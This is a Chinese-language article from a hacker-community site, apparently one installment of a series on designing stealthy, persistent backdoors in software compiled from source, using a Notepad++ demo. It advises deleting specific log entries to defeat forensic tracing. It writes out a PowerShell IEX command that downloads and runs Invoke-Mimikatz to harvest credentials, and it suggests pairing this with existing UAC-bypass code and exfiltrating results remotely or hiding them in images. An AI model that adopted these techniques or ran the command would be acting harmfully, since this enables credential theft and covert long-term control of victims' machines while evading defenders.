本文來自黑客社區：https://hack108.com

前者的話：從第三季開始引入段子，讓本枯燥的學術文章，也變得生動有趣。 第二季的Demo遵循人性五條來設計，回憶這其中五條：

　　1：攻擊方與防禦方的本質是什麼？

增加對方的時間成本，人力成本，資源成本（不限制於伺服器資源），金錢成本。 　　2：安全公司的本質是什麼？ 盈利，最小投入，最大產出。

　　3：安全公司產品的本質是什麼？

能適應大部分客戶，適應市場化，並且適應大部分機器。（包括不限制於資源緊張，寬頻不足等問題的客戶） 　　4：安全人員的本質是什麼？ 賺錢，養家。買房，還房貸。導致，快速解決客戶問題（無論暫時還是永久性解決），以免投訴。 　　5：對接客戶的本質是什麼？

對接客戶也是某公司內安全工作的一員，與概念4相同。

　　6:線索排查與反線索排查 那麼這個demo離可高級可持續性滲透後門還有一段距離，這裡引入第六條「線索排查」與「反線索排查」，在第二季的demo中，它生成了一個名為micropoor.txt的文件，如果經驗豐富的安全人員可根據時間差來排查日記，demo的工作流程大致是這樣的，打開notepad++，生成micropoor.txt，寫入內容，關閉文件流。根據線索排查，定位到notepad++，導致許可權失控。

在線索排查概念中，這裡要引入「ABC」類線索關聯排查，當防禦者在得到線索A，順藤到B，最後排查到目標文件C，根據五條中的第一條，demo要考慮如何刪除指定日誌內容，以及其他操作。來阻止ABC類線索關聯排查。 不要思維固死在這是一個notepad++後門的文章，它是一個面向類後門，面向的是可掌握源碼編譯的類後門。同樣不要把思維固定死在demo中的例子，針對不同版本的NT系統，完全引用「powershell IEX(New-Object System.Net.WebClient).DownloadString(https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1);Invoke-Mimikatz」而關於bypass UAC，已經有成熟的源碼。或發送至遠程或是寫在本地的圖片里，不要讓知識，限制了後門的想像。這也正是第一季所說的：一個優秀的Microdoor是量身目標制定且一般不具備通用性的。是的，一般不具備通用性。 觀看目前文章的一共有2類人，一類攻擊方，一類防守方。假設一個場景，現在擺在你面前有一台筆記本，並且這台筆記本有明確的後門，你的任務，排查後門。我想所有人都會排查註冊表，服務，埠，進程等。因為這些具備通用性，也同樣具備通用性排查手段。

臨近文章結尾，第三次引用：在後門的進化對抗中，rootkit也發生了變化，最大的改變是它的系統層次結構發生了變化。如果徹底理解了這段話。那麼就要引用王健X爸爸的一句話：先定個小目標，控它個1825天。

/* 段子 */ 奈何廠商不重視後滲透攻擊與持久性攻擊，文章的結尾引用馬X爸爸的一句話： 廠商不改變，我們就改變廠商。
推薦閱讀：

相关文章